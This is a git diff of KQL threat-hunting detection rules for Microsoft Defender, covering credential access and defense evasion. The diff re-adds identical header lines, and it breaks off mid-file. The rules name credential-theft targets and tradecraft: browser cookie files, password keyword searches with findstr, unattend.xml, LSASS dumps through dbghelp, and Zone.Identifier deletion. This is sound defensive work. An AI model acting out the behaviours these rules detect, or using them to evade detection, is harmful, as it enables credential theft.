diff --git a/KQL/rules-threat-hunting/Credential Access/access_to_chromium_browsers_sensitive_files_by_uncommon_applications.kql b/KQL/rules-threat-hunting/Credential Access/access_to_chromium_browsers_sensitive_files_by_uncommon_applications.kql
index 838ce0d9..2ae80180 100644
--- a/KQL/rules-threat-hunting/Credential Access/access_to_chromium_browsers_sensitive_files_by_uncommon_applications.kql
+++ b/KQL/rules-threat-hunting/Credential Access/access_to_chromium_browsers_sensitive_files_by_uncommon_applications.kql 
@@ -1,16 +1,16 @@
-// Title: Access To Chromium Browsers Sensitive Files By Uncommon Applications
-// Author: X__Junior (Nextron Systems)
-// Date: 2024-07-29
-// Level: low
-// Description: Detects file access requests to chromium based browser sensitive files by uncommon processes.
-// Could indicate potential attempt of stealing sensitive information.
-// MITRE Tactic: Credential Access
-// Tags: attack.t1003, attack.credential-access, detection.threat-hunting
-// False Positives:
-// - Antivirus, Anti-Spyware, Anti-Malware Software
-// - Backup software
-// - Legitimate software installed on partitions other than "C:\"
-// - Searching software such as "everything.exe"
-
-DeviceFileEvents
+// Title: Access To Chromium Browsers Sensitive Files By Uncommon Applications
+// Author: X__Junior (Nextron Systems)
+// Date: 2024-07-29
+// Level: low
+// Description: Detects file access requests to chromium based browser sensitive files by uncommon processes.
+// Could indicate potential attempt of stealing sensitive information.
+// MITRE Tactic: Credential Access
+// Tags: attack.t1003, attack.credential-access, detection.threat-hunting
+// False Positives:
+// - Antivirus, Anti-Spyware, Anti-Malware Software
+// - Backup software
+// - Legitimate software installed on partitions other than "C:\"
+// - Searching software such as "everything.exe"
+
+DeviceFileEvents
 | where (FileName contains "\\User Data\\Default\\Cookies" or FileName contains "\\User Data\\Default\\History" or FileName contains "\\User Data\\Default\\Network\\Cookies" or FileName contains "\\User Data\\Default\\Web Data") and (not(((InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\system32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\") or InitiatingProcessFolderPath =~ "System"))) and (not(((InitiatingProcessFolderPath endswith "\\MpCopyAccelerator.exe" or InitiatingProcessFolderPath endswith "\\MsMpEng.exe") and InitiatingProcessFolderPath startswith "C:\\ProgramData\\Microsoft\\Windows Defender\\")))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Credential Access/access_to_sysvol_policies_share_by_uncommon_process.kql b/KQL/rules-threat-hunting/Credential Access/access_to_sysvol_policies_share_by_uncommon_process.kql
index 8ee6547c..bf68304c 100644
--- a/KQL/rules-threat-hunting/Credential Access/access_to_sysvol_policies_share_by_uncommon_process.kql
+++ b/KQL/rules-threat-hunting/Credential Access/access_to_sysvol_policies_share_by_uncommon_process.kql
@@ -1,10 +1,10 @@
-// Title: Access To Sysvol Policies Share By Uncommon Process
-// Author: frack113
-// Date: 2023-12-21
-// Level: medium
-// Description: Detects file access requests to the Windows Sysvol Policies Share by uncommon processes
-// MITRE Tactic: Credential Access
-// Tags: attack.credential-access, attack.t1552.006, detection.threat-hunting
-
-DeviceFileEvents
+// Title: Access To Sysvol Policies Share By Uncommon Process
+// Author: frack113
+// Date: 2023-12-21
+// Level: medium
+// Description: Detects file access requests to the Windows Sysvol Policies Share by uncommon processes
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1552.006, detection.threat-hunting
+
+DeviceFileEvents
 | where ((FileName contains "\\sysvol\\" and FileName contains "\\Policies\\") and FileName startswith "\\") and (not((InitiatingProcessFolderPath contains ":\\Program Files (x86)\\" or InitiatingProcessFolderPath contains ":\\Program Files\\" or InitiatingProcessFolderPath contains ":\\Windows\\explorer.exe" or InitiatingProcessFolderPath contains ":\\Windows\\system32\\" or InitiatingProcessFolderPath contains ":\\Windows\\SysWOW64\\")))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Credential Access/dbghelp_dbgcore_dll_loaded_by_uncommon_suspicious_process.kql b/KQL/rules-threat-hunting/Credential Access/dbghelp_dbgcore_dll_loaded_by_uncommon_suspicious_process.kql
index cf376a66..0bbcb478 100644
--- a/KQL/rules-threat-hunting/Credential Access/dbghelp_dbgcore_dll_loaded_by_uncommon_suspicious_process.kql
+++ b/KQL/rules-threat-hunting/Credential Access/dbghelp_dbgcore_dll_loaded_by_uncommon_suspicious_process.kql
@@ -1,15 +1,15 @@
-// Title: Dbghelp/Dbgcore DLL Loaded By Uncommon/Suspicious Process
-// Author: Perez Diego (@darkquassar), oscd.community, Ecco
-// Date: 2019-10-27
-// Level: medium
-// Description: Detects the load of dbghelp/dbgcore DLL by a potentially uncommon or potentially suspicious process.
-// The Dbghelp and Dbgcore DLLs export functions that allow for the dump of process memory. Tools like ProcessHacker, Task Manager and some attacker tradecraft use the MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll.
-// As an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine.
-// Keep in mind that many legitimate Windows processes and services might load the aforementioned DLLs for debugging or other related purposes. Investigate the CommandLine and the Image location of the process loading the DLL.
-// MITRE Tactic: Credential Access
-// Tags: attack.credential-access, attack.t1003.001, detection.threat-hunting
-// False Positives:
-// - Debugging scripts might leverage this DLL in order to dump process memory for further analysis.
-
-DeviceImageLoadEvents
+// Title: Dbghelp/Dbgcore DLL Loaded By Uncommon/Suspicious Process
+// Author: Perez Diego (@darkquassar), oscd.community, Ecco
+// Date: 2019-10-27
+// Level: medium
+// Description: Detects the load of dbghelp/dbgcore DLL by a potentially uncommon or potentially suspicious process.
+// The Dbghelp and Dbgcore DLLs export functions that allow for the dump of process memory. Tools like ProcessHacker, Task Manager and some attacker tradecraft use the MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll.
+// As an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine.
+// Keep in mind that many legitimate Windows processes and services might load the aforementioned DLLs for debugging or other related purposes. Investigate the CommandLine and the Image location of the process loading the DLL.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.001, detection.threat-hunting
+// False Positives:
+// - Debugging scripts might leverage this DLL in order to dump process memory for further analysis.
+
+DeviceImageLoadEvents
 | where ((FolderPath endswith "\\dbghelp.dll" or FolderPath endswith "\\dbgcore.dll") and (InitiatingProcessFolderPath endswith "\\bash.exe" or InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\dnx.exe" or InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\monitoringhost.exe" or InitiatingProcessFolderPath endswith "\\msbuild.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\regsvcs.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\sc.exe" or InitiatingProcessFolderPath endswith "\\scriptrunner.exe" or InitiatingProcessFolderPath endswith "\\winword.exe" or InitiatingProcessFolderPath endswith "\\wmic.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe")) and (not((((InitiatingProcessCommandLine endswith "-k LocalServiceNetworkRestricted" or InitiatingProcessCommandLine endswith "-k WerSvcGroup") and InitiatingProcessFolderPath endswith "\\svchost.exe") or ((InitiatingProcessCommandLine contains "/d srrstr.dll,ExecuteScheduledSPPCreation" or InitiatingProcessCommandLine contains "aepdu.dll,AePduRunUpdate" or InitiatingProcessCommandLine contains "shell32.dll,OpenAs_RunDL" or InitiatingProcessCommandLine contains
"Windows.Storage.ApplicationData.dll,CleanupTemporaryState") and InitiatingProcessFolderPath endswith "\\rundll32.exe") or (InitiatingProcessCommandLine endswith "\\TiWorker.exe -Embedding" and InitiatingProcessCommandLine startswith "C:\\WINDOWS\\WinSxS\\")))) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Credential Access/eventlog_query_requests_by_builtin_utilities.kql b/KQL/rules-threat-hunting/Credential Access/eventlog_query_requests_by_builtin_utilities.kql index a0066c20..30269d98 100644 --- a/KQL/rules-threat-hunting/Credential Access/eventlog_query_requests_by_builtin_utilities.kql +++ b/KQL/rules-threat-hunting/Credential Access/eventlog_query_requests_by_builtin_utilities.kql 
@@ -1,12 +1,12 @@
-// Title: EventLog Query Requests By Builtin Utilities
-// Author: Ali Alwashali, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-11-20
-// Level: medium
-// Description: Detect attempts to query the contents of the event log using command line utilities. Attackers use this technique in order to look for sensitive information in the logs such as passwords, usernames, IPs, etc.
-// MITRE Tactic: Credential Access
-// Tags: attack.t1552, attack.credential-access, detection.threat-hunting
-// False Positives:
-// - Legitimate log access by administrators or troubleshooting tools
-
-DeviceProcessEvents
+// Title: EventLog Query Requests By Builtin Utilities
+// Author: Ali Alwashali, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-11-20
+// Level: medium
+// Description: Detect attempts to query the contents of the event log using command line utilities. Attackers use this technique in order to look for sensitive information in the logs such as passwords, usernames, IPs, etc.
+// MITRE Tactic: Credential Access
+// Tags: attack.t1552, attack.credential-access, detection.threat-hunting
+// False Positives:
+// - Legitimate log access by administrators or troubleshooting tools
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "Select" and ProcessCommandLine contains "Win32_NTLogEvent") or ((ProcessCommandLine contains " qe " or ProcessCommandLine contains " query-events ") and (FolderPath endswith "\\wevtutil.exe" or ProcessVersionInfoOriginalFileName =~ "wevtutil.exe")) or (ProcessCommandLine contains " ntevent" and (FolderPath endswith "\\wmic.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")) or (ProcessCommandLine contains "Get-WinEvent " or ProcessCommandLine contains "get-eventlog ")
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Credential Access/pfx_file_creation.kql b/KQL/rules-threat-hunting/Credential Access/pfx_file_creation.kql
index e49ecfba..8e57d44c 100644
--- a/KQL/rules-threat-hunting/Credential Access/pfx_file_creation.kql
+++ b/KQL/rules-threat-hunting/Credential Access/pfx_file_creation.kql
@@ -1,23 +1,23 @@
-// Title: PFX File Creation
-// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
-// Date: 2020-05-02
-// Level: low
-// Description: Detects the creation of PFX files (Personal Information Exchange format).
-// PFX files contain private keys and certificates bundled together, making them valuable targets for attackers seeking to:
-// - Exfiltrate digital certificates for impersonation or signing malicious code
-// - Establish persistent access through certificate-based authentication
-// - Bypass security controls that rely on certificate validation
-// Analysts should investigate PFX file creation events by examining which process created the PFX file and its parent process chain, as well as unusual locations outside standard certificate stores or development environments.
-// MITRE Tactic: Credential Access
-// Tags: attack.credential-access, attack.t1552.004, detection.threat-hunting
-// False Positives:
-// - System administrators legitimately managing certificates and PKI infrastructure
-// - Development environments where developers create test certificates for application signing
-// - Automated certificate deployment tools and scripts used in enterprise environments
-// - Software installation processes that include certificate provisioning (e.g., web servers, VPN clients)
-// - Certificate backup and recovery operations performed by IT staff
-// - Build systems and CI/CD pipelines that generate code signing certificates
-// - Third-party applications that create temporary certificates for secure communications
-
-DeviceFileEvents
+// Title: PFX File Creation
+// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
+// Date: 2020-05-02
+// Level: low
+// Description: Detects the creation of PFX files (Personal Information Exchange format).
+// PFX files contain private keys and certificates bundled together, making them valuable targets for attackers seeking to:
+// - Exfiltrate digital certificates for impersonation or signing malicious code
+// - Establish persistent access through certificate-based authentication
+// - Bypass security controls that rely on certificate validation
+// Analysts should investigate PFX file creation events by examining which process created the PFX file and its parent process chain, as well as unusual locations outside standard certificate stores or development environments.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1552.004, detection.threat-hunting
+// False Positives:
+// - System administrators legitimately managing certificates and PKI infrastructure
+// - Development environments where developers create test certificates for application signing
+// - Automated certificate deployment tools and scripts used in enterprise environments
+// - Software installation processes that include certificate provisioning (e.g., web servers, VPN clients)
+// - Certificate backup and recovery operations performed by IT staff
+// - Build systems and CI/CD pipelines that generate code signing certificates
+// - Third-party applications that create temporary certificates for secure communications
+
+DeviceFileEvents
 | where FolderPath endswith ".pfx" and (not((FolderPath startswith "C:\\Program Files\\CMake\\" or ((InitiatingProcessFolderPath in~ ("C:\\Program Files\\Microsoft OneDrive\\OneDrive.exe", "C:\\Program Files (x86)\\Microsoft OneDrive\\OneDrive.exe")) and FolderPath endswith "\\OneDrive\\CodeSigning.pfx") or (FolderPath startswith "C:\\Program Files (x86)\\Microsoft Visual Studio\\" or FolderPath startswith "C:\\Program Files\\Microsoft Visual Studio\\"))))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Credential Access/potential_password_reconnaissance_via_findstr_exe.kql b/KQL/rules-threat-hunting/Credential Access/potential_password_reconnaissance_via_findstr_exe.kql
index bcae8b3a..da9ac05f 100644
--- a/KQL/rules-threat-hunting/Credential Access/potential_password_reconnaissance_via_findstr_exe.kql
+++ b/KQL/rules-threat-hunting/Credential Access/potential_password_reconnaissance_via_findstr_exe.kql
@@ -1,10 +1,10 @@
-// Title: Potential Password Reconnaissance Via Findstr.EXE
-// Author: Josh Nickels
-// Date: 2023-05-18
-// Level: medium
-// Description: Detects command line usage of "findstr" to search for the "passwords" keyword in a variety of different languages
-// MITRE Tactic: Credential Access
-// Tags: attack.credential-access, attack.t1552.001, detection.threat-hunting
-
-DeviceProcessEvents
+// Title: Potential Password Reconnaissance Via Findstr.EXE
+// Author: Josh Nickels
+// Date: 2023-05-18
+// Level: medium
+// Description: Detects command line usage of "findstr" to search for the "passwords" keyword in a variety of different languages
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1552.001, detection.threat-hunting
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "contraseña" or ProcessCommandLine contains "hasło" or ProcessCommandLine contains "heslo" or ProcessCommandLine contains "parola" or ProcessCommandLine contains "passe" or ProcessCommandLine contains "passw" or ProcessCommandLine contains "senha" or ProcessCommandLine contains "senord" or ProcessCommandLine contains "密碼") and (FolderPath endswith "\\findstr.exe" or ProcessVersionInfoOriginalFileName =~ "FINDSTR.EXE")
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Credential Access/unattend_xml_file_access_attempt.kql b/KQL/rules-threat-hunting/Credential Access/unattend_xml_file_access_attempt.kql
index 7893ac39..a83b7774 100644
--- a/KQL/rules-threat-hunting/Credential Access/unattend_xml_file_access_attempt.kql
+++ b/KQL/rules-threat-hunting/Credential Access/unattend_xml_file_access_attempt.kql
@@ -1,11 +1,11 @@
-// Title: Unattend.XML File Access Attempt
-// Author: frack113
-// Date: 2024-07-22
-// Level: low
-// Description: Detects attempts to access the "unattend.xml" file, where credentials might be stored.
-// This file is used during the unattended windows install process.
-// MITRE Tactic: Credential Access
-// Tags: attack.credential-access, attack.t1552.001, detection.threat-hunting
-
-DeviceFileEvents
+// Title: Unattend.XML File Access Attempt
+// Author: frack113
+// Date: 2024-07-22
+// Level: low
+// Description: Detects attempts to access the "unattend.xml" file, where credentials might be stored.
+// This file is used during the unattended windows install process.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1552.001, detection.threat-hunting
+
+DeviceFileEvents
 | where FileName endswith "\\Panther\\unattend.xml"
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Defense Evasion/access_to_reg_hive_files_by_uncommon_applications.kql b/KQL/rules-threat-hunting/Defense Evasion/access_to_reg_hive_files_by_uncommon_applications.kql
index fd5762fa..4def8a05 100644
--- a/KQL/rules-threat-hunting/Defense Evasion/access_to_reg_hive_files_by_uncommon_applications.kql
+++ b/KQL/rules-threat-hunting/Defense Evasion/access_to_reg_hive_files_by_uncommon_applications.kql
@@ -1,12 +1,12 @@
-// Title: Access To .Reg/.Hive Files By Uncommon Applications
-// Author: frack113
-// Date: 2023-09-15
-// Level: low
-// Description: Detects file access requests to files ending with either the ".hive"/".reg" extension, usually associated with Windows Registry backups.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.t1112, attack.defense-evasion, attack.persistence, detection.threat-hunting
-// False Positives:
-// - Third party software installed in the user context might generate a lot of FPs. Heavy baselining and tuning might be required.
-
-DeviceFileEvents
+// Title: Access To .Reg/.Hive Files By Uncommon Applications
+// Author: frack113
+// Date: 2023-09-15
+// Level: low
+// Description: Detects file access requests to files ending with either the ".hive"/".reg" extension, usually associated with Windows Registry backups.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.t1112, attack.defense-evasion, attack.persistence, detection.threat-hunting
+// False Positives:
+// - Third party software installed in the user context might generate a lot of FPs. Heavy baselining and tuning might be required.
+
+DeviceFileEvents
 | where (FileName endswith ".hive" or FileName endswith ".reg") and (not((InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\")))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Defense Evasion/access_to_windows_outlook_mail_files_by_uncommon_applications.kql b/KQL/rules-threat-hunting/Defense Evasion/access_to_windows_outlook_mail_files_by_uncommon_applications.kql
index 09dbf8fb..3987d66e 100644
--- a/KQL/rules-threat-hunting/Defense Evasion/access_to_windows_outlook_mail_files_by_uncommon_applications.kql
+++ b/KQL/rules-threat-hunting/Defense Evasion/access_to_windows_outlook_mail_files_by_uncommon_applications.kql 
@@ -1,17 +1,17 @@
-// Title: Access To Windows Outlook Mail Files By Uncommon Applications
-// Author: frack113
-// Date: 2024-05-10
-// Level: low
-// Description: Detects file access requests to Windows Outlook Mail by uncommon processes.
-// Could indicate potential attempt of credential stealing.
-// Requires heavy baselining before usage
-// MITRE Tactic: Defense Evasion
-// Tags: attack.t1070.008, attack.defense-evasion, detection.threat-hunting
-// False Positives:
-// - Antivirus, Anti-Spyware, Anti-Malware Software
-// - Backup software
-// - Legitimate software installed on partitions other than "C:\"
-// - Searching software such as "everything.exe"
-
-DeviceFileEvents
+// Title: Access To Windows Outlook Mail Files By Uncommon Applications
+// Author: frack113
+// Date: 2024-05-10
+// Level: low
+// Description: Detects file access requests to Windows Outlook Mail by uncommon processes.
+// Could indicate potential attempt of credential stealing.
+// Requires heavy baselining before usage
+// MITRE Tactic: Defense Evasion
+// Tags: attack.t1070.008, attack.defense-evasion, detection.threat-hunting
+// False Positives:
+// - Antivirus, Anti-Spyware, Anti-Malware Software
+// - Backup software
+// - Legitimate software installed on partitions other than "C:\"
+// - Searching software such as "everything.exe"
+
+DeviceFileEvents
 | where (FileName contains "\\AppData\\Local\\Comms\\Unistore\\data" or FileName endswith "\\AppData\\Local\\Comms\\UnistoreDB\\store.vol") and (not(((InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\system32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\") or InitiatingProcessFolderPath =~ "System"))) and (not((((InitiatingProcessFolderPath endswith "\\MpCopyAccelerator.exe" or InitiatingProcessFolderPath endswith "\\MsMpEng.exe") and InitiatingProcessFolderPath startswith
"C:\\ProgramData\\Microsoft\\Windows Defender\\") or (InitiatingProcessFolderPath endswith "\\thor64.exe" or InitiatingProcessFolderPath endswith "\\thor.exe")))) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Defense Evasion/ads_zone_identifier_deleted.kql b/KQL/rules-threat-hunting/Defense Evasion/ads_zone_identifier_deleted.kql index 79bc3f45..1b7df97c 100644 --- a/KQL/rules-threat-hunting/Defense Evasion/ads_zone_identifier_deleted.kql +++ b/KQL/rules-threat-hunting/Defense Evasion/ads_zone_identifier_deleted.kql @@ -1,12 +1,12 @@ -// Title: ADS Zone.Identifier Deleted -// Author: frack113 -// Date: 2023-09-04 -// Level: low -// Description: Detects the deletion of the "Zone.Identifier" ADS. Attackers can leverage this in order to bypass security restrictions that make use of the ADS such as Microsoft Office apps. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1070.004, detection.threat-hunting -// False Positives: -// - Likely - -DeviceFileEvents +// Title: ADS Zone.Identifier Deleted +// Author: frack113 +// Date: 2023-09-04 +// Level: low +// Description: Detects the deletion of the "Zone.Identifier" ADS. Attackers can leverage this in order to bypass security restrictions that make use of the ADS such as Microsoft Office apps. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1070.004, detection.threat-hunting +// False Positives: +// - Likely + +DeviceFileEvents | where FolderPath endswith ":Zone.Identifier" \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Defense Evasion/amsi_dll_load_by_uncommon_process.kql b/KQL/rules-threat-hunting/Defense Evasion/amsi_dll_load_by_uncommon_process.kql index 0e137233..8b9686a4 100644 --- a/KQL/rules-threat-hunting/Defense Evasion/amsi_dll_load_by_uncommon_process.kql +++ b/KQL/rules-threat-hunting/Defense Evasion/amsi_dll_load_by_uncommon_process.kql 
@@ -1,12 +1,12 @@
-// Title: Amsi.DLL Load By Uncommon Process
-// Author: frack113
-// Date: 2023-03-12
-// Level: low
-// Description: Detects loading of Amsi.dll by uncommon processes
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.impact, attack.t1490, detection.threat-hunting
-// False Positives:
-// - Legitimate third party apps installed in "ProgramData" and "AppData" might generate some false positives. Apply additional filters accordingly
-
-DeviceImageLoadEvents
+// Title: Amsi.DLL Load By Uncommon Process
+// Author: frack113
+// Date: 2023-03-12
+// Level: low
+// Description: Detects loading of Amsi.dll by uncommon processes
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.impact, attack.t1490, detection.threat-hunting
+// False Positives:
+// - Legitimate third party apps installed in "ProgramData" and "AppData" might generate some false positives. Apply additional filters accordingly
+
+DeviceImageLoadEvents
 | where FolderPath endswith "\\amsi.dll" and (not((((InitiatingProcessFolderPath contains ":\\Windows\\Microsoft.NET\\Framework\\" or InitiatingProcessFolderPath contains ":\\Windows\\Microsoft.NET\\Framework64\\" or InitiatingProcessFolderPath contains ":\\Windows\\Microsoft.NET\\FrameworkArm\\" or InitiatingProcessFolderPath contains ":\\Windows\\Microsoft.NET\\FrameworkArm64\\") and InitiatingProcessFolderPath endswith "\\ngentask.exe") or InitiatingProcessFolderPath =~ "" or (InitiatingProcessFolderPath endswith ":\\Windows\\explorer.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\Sysmon64.exe") or (InitiatingProcessFolderPath contains ":\\Program Files (x86)\\" or InitiatingProcessFolderPath contains ":\\Program Files\\" or InitiatingProcessFolderPath contains ":\\Windows\\System32\\" or InitiatingProcessFolderPath contains ":\\Windows\\SysWOW64\\" or InitiatingProcessFolderPath contains ":\\Windows\\WinSxS\\") or isnull(InitiatingProcessFolderPath)))) and
(not((InitiatingProcessFolderPath contains ":\\ProgramData\\Microsoft\\Windows Defender\\Platform\\" and InitiatingProcessFolderPath endswith "\\MsMpEng.exe")))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Defense Evasion/bits_client_bitsproxy_dll_loaded_by_uncommon_process.kql b/KQL/rules-threat-hunting/Defense Evasion/bits_client_bitsproxy_dll_loaded_by_uncommon_process.kql
index 52b3cc90..32083fcb 100644
--- a/KQL/rules-threat-hunting/Defense Evasion/bits_client_bitsproxy_dll_loaded_by_uncommon_process.kql
+++ b/KQL/rules-threat-hunting/Defense Evasion/bits_client_bitsproxy_dll_loaded_by_uncommon_process.kql
@@ -1,13 +1,13 @@
-// Title: BITS Client BitsProxy DLL Loaded By Uncommon Process
-// Author: UnicornOfHunt
-// Date: 2025-06-04
-// Level: low
-// Description: Detects an uncommon process loading the "BitsProxy.dll". This DLL is used when the BITS COM instance or API is used.
-// This detection can be used to hunt for uncommon processes loading this DLL in your environment. Which may indicate potential suspicious activity occurring.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.persistence, attack.t1197, detection.threat-hunting
-// False Positives:
-// - Allowed binaries in the environment that do BITS Jobs
-
-DeviceImageLoadEvents
+// Title: BITS Client BitsProxy DLL Loaded By Uncommon Process
+// Author: UnicornOfHunt
+// Date: 2025-06-04
+// Level: low
+// Description: Detects an uncommon process loading the "BitsProxy.dll". This DLL is used when the BITS COM instance or API is used.
+// This detection can be used to hunt for uncommon processes loading this DLL in your environment. Which may indicate potential suspicious activity occurring.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.t1197, detection.threat-hunting
+// False Positives:
+// - Allowed binaries in the environment that do BITS Jobs
+
+DeviceImageLoadEvents
 | where FolderPath endswith "\\BitsProxy.dll" and (not((InitiatingProcessFolderPath in~ ("C:\\Windows\\System32\\aitstatic.exe", "C:\\Windows\\System32\\bitsadmin.exe", "C:\\Windows\\System32\\desktopimgdownldr.exe", "C:\\Windows\\System32\\DeviceEnroller.exe", "C:\\Windows\\System32\\MDMAppInstaller.exe", "C:\\Windows\\System32\\ofdeploy.exe", "C:\\Windows\\System32\\RecoveryDrive.exe", "C:\\Windows\\System32\\Speech_OneCore\\common\\SpeechModelDownload.exe", "C:\\Windows\\SysWOW64\\bitsadmin.exe", "C:\\Windows\\SysWOW64\\OneDriveSetup.exe", "C:\\Windows\\SysWOW64\\Speech_OneCore\\Common\\SpeechModelDownload.exe")))) and (not(InitiatingProcessFolderPath =~ "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe"))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Defense Evasion/codepage_modification_via_mode_com.kql b/KQL/rules-threat-hunting/Defense Evasion/codepage_modification_via_mode_com.kql
index ab2561de..8ae99b14 100644
--- a/KQL/rules-threat-hunting/Defense Evasion/codepage_modification_via_mode_com.kql
+++ b/KQL/rules-threat-hunting/Defense Evasion/codepage_modification_via_mode_com.kql
@@ -1,11 +1,11 @@
-// Title: CodePage Modification Via MODE.COM
-// Author: Nasreddine Bencherchali (Nextron Systems), Joseliyo Sanchez, @Joseliyo_Jstnk
-// Date: 2024-01-19
-// Level: low
-// Description: Detects a CodePage modification using the "mode.com" utility.
-// This behavior has been used by threat actors behind Dharma ransomware.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1036, detection.threat-hunting
-
-DeviceProcessEvents
+// Title: CodePage Modification Via MODE.COM
+// Author: Nasreddine Bencherchali (Nextron Systems), Joseliyo Sanchez, @Joseliyo_Jstnk
+// Date: 2024-01-19
+// Level: low
+// Description: Detects a CodePage modification using the "mode.com" utility.
+// This behavior has been used by threat actors behind Dharma ransomware.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036, detection.threat-hunting
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains " con " and ProcessCommandLine contains " cp " and ProcessCommandLine contains " select=") and (FolderPath endswith "\\mode.com" or ProcessVersionInfoOriginalFileName =~ "MODE.COM")
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Defense Evasion/diskshadow_child_process_spawned.kql b/KQL/rules-threat-hunting/Defense Evasion/diskshadow_child_process_spawned.kql
index b35244e3..a158ba7a 100644
--- a/KQL/rules-threat-hunting/Defense Evasion/diskshadow_child_process_spawned.kql
+++ b/KQL/rules-threat-hunting/Defense Evasion/diskshadow_child_process_spawned.kql
@@ -1,12 +1,12 @@
-// Title: Diskshadow Child Process Spawned
-// Author: Harjot Singh @cyb3rjy0t
-// Date: 2023-09-15
-// Level: medium
-// Description: Detects any child process spawning from "Diskshadow.exe". This could be due to executing Diskshadow in interpreter mode or script mode and using the "exec" flag to launch other applications.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218, attack.execution, detection.threat-hunting
-// False Positives:
-// - Likely from legitimate usage of Diskshadow in Interpreter mode.
-
-DeviceProcessEvents
+// Title: Diskshadow Child Process Spawned
+// Author: Harjot Singh @cyb3rjy0t
+// Date: 2023-09-15
+// Level: medium
+// Description: Detects any child process spawning from "Diskshadow.exe". This could be due to executing Diskshadow in interpreter mode or script mode and using the "exec" flag to launch other applications.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218, attack.execution, detection.threat-hunting
+// False Positives:
+// - Likely from legitimate usage of Diskshadow in Interpreter mode.
+
+DeviceProcessEvents
 | where InitiatingProcessFolderPath endswith "\\diskshadow.exe" and (not(FolderPath endswith ":\\Windows\\System32\\WerFault.exe"))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Defense Evasion/diskshadow_script_mode_execution.kql b/KQL/rules-threat-hunting/Defense Evasion/diskshadow_script_mode_execution.kql
index e997e57b..264c2921 100644
--- a/KQL/rules-threat-hunting/Defense Evasion/diskshadow_script_mode_execution.kql
+++ b/KQL/rules-threat-hunting/Defense Evasion/diskshadow_script_mode_execution.kql
@@ -1,12 +1,12 @@
-// Title: Diskshadow Script Mode Execution
-// Author: Ivan Dyachkov, oscd.community
-// Date: 2020-10-07
-// Level: medium
-// Description: Detects execution of "Diskshadow.exe" in script mode using the "/s" flag. Attackers often abuse "diskshadow" to execute scripts that deleted the shadow copies on the systems. Investigate the content of the scripts and its location.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218, attack.execution, detection.threat-hunting
-// False Positives:
-// - Likely from legitimate backup scripts
-
-DeviceProcessEvents
+// Title: Diskshadow Script Mode Execution
+// Author: Ivan Dyachkov, oscd.community
+// Date: 2020-10-07
+// Level: medium
